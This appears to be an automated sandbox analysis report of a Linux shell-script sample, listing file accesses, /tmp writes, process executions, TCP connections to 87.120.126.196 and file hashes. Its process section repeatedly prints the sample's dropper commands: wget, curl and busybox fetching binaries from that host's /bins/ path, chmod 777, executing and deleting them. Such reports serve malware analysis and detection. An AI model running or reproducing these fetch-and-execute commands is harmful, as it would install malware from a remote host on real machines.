File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /usr/bin/curl N/A
File opened for modification /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /usr/bin/curl N/A
File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /usr/bin/curl N/A
File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /usr/bin/curl N/A
File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /usr/bin/curl N/A
File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /usr/bin/curl N/A
File opened for modification /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /usr/bin/curl N/A
File opened for modification /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /usr/bin/curl N/A
File opened for modification /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /usr/bin/curl N/A
File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /usr/bin/curl N/A
File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /usr/bin/curl N/A
File opened for modification /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /usr/bin/curl N/A
File opened for modification /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /usr/bin/curl N/A
File opened for modification /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /usr/bin/curl N/A
File opened for modification /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /usr/bin/curl N/A
File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /usr/bin/curl N/A
File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /usr/bin/curl N/A
File opened for modification /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /usr/bin/curl N/A
File opened for modification /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /usr/bin/curl N/A
File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /usr/bin/curl N/A
File opened for modification /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /usr/bin/curl N/A
File opened for modification /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /usr/bin/curl N/A
File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /usr/bin/curl N/A
File opened for modification /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /usr/bin/curl N/A
File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /usr/bin/curl N/A
File opened for modification /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /usr/bin/curl N/A
File opened for modification /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /usr/bin/curl N/A
File opened for modification /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /usr/bin/curl N/A

Processes

/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh

[/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/chmod

[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms

[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/rm

[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/usr/bin/wget

[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/chmod

[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt

[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/rm

[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/usr/bin/wget

[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/chmod

[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF

[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/rm

[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/usr/bin/wget

[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/chmod

[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs

[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/rm

[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/usr/bin/wget

[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/chmod

[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa

[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/rm

[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/usr/bin/wget

[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/chmod

[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB

[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/rm

[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/chmod

[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S

[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/rm

[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/usr/bin/wget

[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/chmod

[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo

[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/rm

[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/usr/bin/wget

[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/chmod

[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K

[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/rm

[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/usr/bin/wget

[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/chmod

[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f

[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/rm

[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/usr/bin/wget

[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/chmod

[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU

[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/rm

[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/usr/bin/wget

[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/chmod

[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD

[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/rm

[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/usr/bin/wget

[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/chmod

[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF

[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/rm

[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/usr/bin/wget

[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/chmod

[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0

[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/rm

[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/chmod

[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K

[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/rm

[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/usr/bin/wget

[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/chmod

[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f

[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/rm

[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/usr/bin/wget

[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/chmod

[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU

[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/rm

[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/usr/bin/wget

[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/chmod

[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo

[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/rm

[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/usr/bin/wget

[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/chmod

[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF

[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/rm

[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/usr/bin/wget

[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/chmod

[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0

[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/rm

[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/chmod

[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD

[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/rm

[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/usr/bin/wget

[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/chmod

[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt

[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/rm

[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/usr/bin/wget

[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/chmod

[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF

[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/rm

[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/usr/bin/wget

[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/chmod

[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs

[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/rm

[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/usr/bin/wget

[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/chmod

[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa

[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/rm

[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/usr/bin/wget

[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/chmod

[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms

[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/rm

[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/usr/bin/wget

[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/chmod

[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB

[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/rm

[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/chmod

[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S

[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/rm

[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
